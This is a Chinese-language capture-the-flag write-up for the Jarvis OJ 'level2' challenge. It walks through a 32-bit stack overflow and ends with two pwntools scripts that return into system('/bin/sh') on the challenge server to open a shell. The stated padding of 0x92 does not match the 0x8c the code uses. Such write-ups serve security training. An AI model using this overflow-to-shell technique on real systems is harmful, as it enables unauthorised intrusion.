题目地址 https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 先看一下文件的属性 32位 在看看保护机制 开启了NX 那么就不能shellcode 丢到IDA看看 main函数先执行vulnerable_function,
题目地址
https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1
先看一下文件的属性 32位
在看看保护机制
开启了NX 那么就不能shellcode
丢到IDA看看
main函数先执行vulnerable_function,在输出hello world
IDA按Shift+F12查看字符,发现有shell
那么可以利用read函数的栈溢出,buf需要填充0x92个字符(0x4+0x88)
现在可以构造一个system("/bin/sh")的伪栈帧,通过控制vulnerable_function函数返回到该伪栈帧的地址,执行system("/bin/sh")来获取shell
system的地址为08048320
/bin/sh的地址为0804A024
from pwn import *
r=remote(‘pwn2.jarvisoj.com‘,9878)
payload=‘a‘*(0x88+0x4)+p32(0x08048320)+‘aaaa‘+p32(0x804a024) //
r.sendline(payload)
r.interactive()
跳到system地址,返回地址为0xaaaa,参数为/bin/sh
或者
from pwn import *
p = remote(‘pwn2.jarvisoj.com‘,‘9878‘) elf = ELF(‘./level2‘) sh_addr = elf.search(‘/bin/sh‘).next() print p32(sh_addr) system_addr = elf.symbols[‘system‘] print p32(system_addr) payload = ‘a‘ * (0x88 + 0x4) + p32(system_addr) +‘aaaa‘ + p32(sh_addr) p.send(payload) p.interactive()
执行